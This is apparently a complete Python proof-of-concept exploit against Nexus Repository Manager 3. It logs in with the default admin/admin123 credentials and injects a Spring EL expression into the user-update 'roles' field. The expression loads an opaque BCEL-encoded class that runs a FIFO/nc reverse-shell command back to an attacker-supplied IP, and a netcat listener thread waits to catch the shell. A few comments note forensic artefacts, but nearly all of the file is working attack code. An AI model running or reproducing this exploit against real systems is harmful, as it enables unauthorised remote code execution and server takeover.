import requests
import json
import subprocess
import threading

# === Interactive input ===
# All four values are read verbatim from stdin and only whitespace-stripped;
# nothing is validated, so a bad IP or a non-numeric port surfaces later, at
# the first HTTP request or when nc is started.
target_ip = input("请输入目标 Nexus3 IP(例如 192.168.109.4): ").strip()
target_port = input("请输入目标 Nexus3 端口(例如 60357): ").strip()
callback_ip = input("请输入本机监听 IP(例如 192.168.109.10): ").strip()
callback_port = input("请输入本机监听端口(例如 4444): ").strip()

# Base URL of the target; every request below is plain HTTP, so the session
# cookie and the injected payload travel in clear text on the wire.
HOST = f"http://{target_ip}:{target_port}"
CALLBACK_IP = callback_ip
CALLBACK_PORT = callback_port

# Login credentials, pre-encoded as base64 with the "=" padding URL-escaped
# as %3D: "YWRtaW4=" decodes to "admin", "YWRtaW4xMjM=" to "admin123"
# (historically the Nexus default admin password). The script therefore only
# works with valid admin credentials -- this is a post-authentication PoC.
USERNAME_B64 = "YWRtaW4%3D"
PASSWORD_B64 = "YWRtaW4xMjM%3D"

# === Full BCEL-encoded class (must be a single line) ===
# Opaque BCEL "$$BCEL$$" class image, loaded further down through the JDK
# internal com.sun.org.apache.bcel.internal.util.ClassLoader. The EL
# expression calls .exec(...) on an instance of it, so presumably the class
# exposes an exec(String) method -- its source is not on this page.
BCEL_STRING = """$$BCEL$$$l$8b$I$A$A$A$A$A$A$ff$8dSMS$d3P$U$3d$8f$b6I$J$v$U$K$94$60QA$c5P$uU$E$3fZD$Fq$86$Z$40$87$3a$3a$ZWi$fa$c0$60I$3ai$ca$b0r$e5$7fq$ab$9b$d6$91$d1$a5$L$7f$87$L$fd$P$8ex_Z$3e$8a$ca$d8I$df$cb$bb$f7$9c$7b$eeG$de$d7_$l$3f$D$98$c5$p$F$j$I$c9$I$ab$88$40b$88o$9b$bbf$b6l$3a$5b$d9$c7$c5mn$f9$M$d2$bc$ed$d8$fe$CCH$9fx$a6$m$8aN$Z$8a$8a$$$a8$M$bd$c7$f0$8d$9a$e3$db$3b$9cA$d9$e2$fe$d1a$40$9fX$fd$D$93$97$d1$dd$sU$f0$3d$db$d9$8a$o$ce$mg$8b$b6$93$ad$be$8c$a2$8f$a1$pc$J$c1$7e$V$D$Yd$I$f3$3dn1$e8$fa$8b$d5$d3$dc$fcI$99$t$9ek$f1j$95d$86$Y$G$D$bb$edf$Xk$9b$9b$dc$e3$a5$Nn$96$b8$tc$98A$3b$f4$ad8$95$9aO$91$b8$b9$d3t$xHaD$c6y$V$Xp$b1$ad$ceVp$86n$aa$f3$E$8f$nyXk$7b$c0$bc$C$Nc$a2$bf$97$Y$86$f4$bfBDc$93$b8$o$40$e3$M$89cP3$9b$c0$9f$82$aebBd$p$94$97$3d$cf$f5$9al$Z$93$q$7e$ba$p$8b5$bb$i$U$92FH$E$9fV$91$c55$86$uQJ$ab$b6C$c3$e9o$hN$ab$91$820$a3$e2$Gfi$f4f$a5$c2$9d$SCF$3f$bb$e3m$92A$88$9b$o$c4$z$86$94$bet6$f0$8e$8a$5c$90$97$ef6$9d2$e6$Z$o$7c$d7$y$cf$d0$c8$97$dc$Se$da$p$S$5e$af$ed$U$b9$f7$d4$y$96$c92$fe_$Z$e5$Zb$F$df$b4$5e$ad$99$95$WQY$de$b3x$c5$b7$5d$a7$wc$89$9a$7d$cc9$f2$Q$aa$e0$d6$3c$8b$3f$b2$DJ$90$cc$b4$Ab$Uy$ba1$e2$d7$B$s$ee$M$adw$e94B$3b$a3$3d$92n$80$bd$a7$X$86$FZ$a5$c0$Y$a6u$A$f7$88$o$a0$df$88$s$d3$fe$e6$Dd$e9$TbF$a8$af$a7$60$84$fbz$LFd$b2PGbm$lIc$l$9a1U$c7$b9$GF$h$b8$bc$7e$c2t$b5i$ca$85$f7$916$g$98$caE2ud$8c$9c$f4$F$J$z$a2Iu$5c$8f$xu$cc$3d$7f$7b$f0C$L$ff$cb$f5$5d$8b$d4q$fb$5dP$88$c8t$i$9d$b4F$e9$5b$ed$c2$YTL$n$869t$e3$3e$e2XA$C$W$fa$f1$g$83t$G$f9C$Hd$94d$d0$j$8b$c9H$c9H$GO$g$f8$J$8dl$c3x$d0$aa$7b$91$fe$P$D$95$e5$df$5d$90$g$iv$E$A$A"""

# === 监听线程 ===
def listen_shell() -> None:
    """Run a foreground ``nc -lvnp CALLBACK_PORT`` listener until nc exits.

    This is the receiving end for the reverse shell the payload below tries
    to trigger. ``subprocess.call`` blocks for as long as nc runs, which is
    why the caller starts it on a separate thread. A ``nc`` binary that
    accepts ``-lvnp`` must be on PATH; if it is missing ``subprocess.call``
    raises FileNotFoundError inside this thread only.
    """
    print(f"\n[+] 启动监听:nc -lvnp {CALLBACK_PORT}")
    print("[*] 如果目标成功反弹,你将在此终端获得 shell。\n")
    subprocess.call(["nc", "-lvnp", str(CALLBACK_PORT)])

# === 启动监听线程 ===
# === Start the listener thread ===
# Started before the login so the listener is already up when the payload
# fires. The thread is non-daemon (threading default), so the process stays
# alive until nc exits even if the main flow calls exit() early.
listener_thread = threading.Thread(target=listen_shell)
listener_thread.start()

# === 登录获取 NXSESSIONID ===
# === Log in and obtain NXSESSIONID ===
# Nexus UI session endpoint. The browser-like headers (X-Nexus-UI, Origin,
# Referer, XMLHttpRequest) imitate the web UI's own login request.
login_url = f"{HOST}/service/rapture/session"
login_headers = {
    "X-Nexus-UI": "true",
    "Referer": f"{HOST}/",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "User-Agent": "Mozilla/5.0",
    "Accept": "*/*",
    "Origin": HOST,
    "X-Requested-With": "XMLHttpRequest",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
}

# Form body carrying the URL-escaped base64 credentials defined above.
login_data = f"username={USERNAME_B64}&password={PASSWORD_B64}"

print("\n[+] 正在登录 Nexus3...")
session = requests.Session()
# No timeout is passed, so an unresponsive target blocks here indefinitely.
resp = session.post(login_url, headers=login_headers, data=login_data)

# Login counts as failed only when BOTH signals are missing: no Set-Cookie
# header AND a status other than 204. Any other combination falls through.
if "Set-Cookie" not in resp.headers and resp.status_code != 204:
    print("[-] 登录失败!响应内容:")
    print(resp.text)
    exit()  # site-module exit(); only the main thread stops (see listener note)

# Session cookie issued by the login. A missing NXSESSIONID yields "" rather
# than an error, so the next request would be sent with an empty cookie value.
cookie = session.cookies.get_dict().get("NXSESSIONID", "")
print(f"[+] 登录成功,NXSESSIONID = {cookie}\n")

# === 构造 Spring-EL 注入 payload ===
# === Build the Spring-EL injection payload ===
# The doubled braces in the f-string yield a literal ${...} expression. It
# obtains the JDK-internal BCEL ClassLoader via ''.class.forName, loads the
# BCEL-encoded class above, and calls exec() on a fresh instance with a
# reverse-shell command (FIFO at /tmp/f, /bin/sh piped through nc back to
# CALLBACK_IP:CALLBACK_PORT). On an affected host the /tmp/f FIFO and the
# outbound nc connection from the Nexus service account are the artefacts
# an investigator would look for.
el_expr = (
    f"${{''.class.forName('com.sun.org.apache.bcel.internal.util.ClassLoader')"
    f".newInstance().loadClass('{BCEL_STRING}')"
    f".newInstance().exec('rm -f /tmp/f;mkfifo /tmp/f;/bin/sh -i < /tmp/f 2>&1 | nc {CALLBACK_IP} {CALLBACK_PORT} > /tmp/f')}}"
)

# ExtDirect RPC envelope for coreui_User.update on the built-in admin user.
# The expression is carried as the single entry of "roles"; the remaining
# fields are ordinary profile values. "version" is presumably an optimistic
# locking counter -- TODO confirm whether a mismatch rejects the update before
# the role value is evaluated.
inject_data = {
    "action": "coreui_User",
    "method": "update",
    "data": [{
        "userId": "admin",
        "version": "10",
        "firstName": "Administrator",
        "lastName": "User1",
        "email": "[email protected]",
        "status": "active",
        "roles": [el_expr]
    }],
    "type": "rpc",
    "tid": 24
}

# Same UI-imitating headers as the login, plus the session cookie set by hand
# (the requests.Session would also send it from its cookie jar).
inject_headers = {
    "Cookie": f"NXSESSIONID={cookie}",
    "Content-Type": "application/json",
    "Origin": HOST,
    "Referer": f"{HOST}/",
    "X-Nexus-UI": "true",
    "User-Agent": "Mozilla/5.0",
    "X-Requested-With": "XMLHttpRequest"
}

print("[+] 正在发送 exploit payload...")
# Nexus ExtDirect router. From a detection standpoint, a coreui_User.update
# request whose "roles" entries contain "${" is the thing to alert on.
exploit_url = f"{HOST}/service/extdirect"
exploit_resp = session.post(exploit_url, headers=inject_headers, data=json.dumps(inject_data))

# The response is printed verbatim; the script does not interpret it. Whether
# the payload worked is judged by a shell arriving on the listener.
print(f"[+] 返回状态码: {exploit_resp.status_code}")
print("[+] 服务器响应:")
print(exploit_resp.text)

# === Wait for the listener thread (i.e. the interactive shell) ===
# Blocks until nc exits, keeping the script alive while the shell is in use.
listener_thread.join()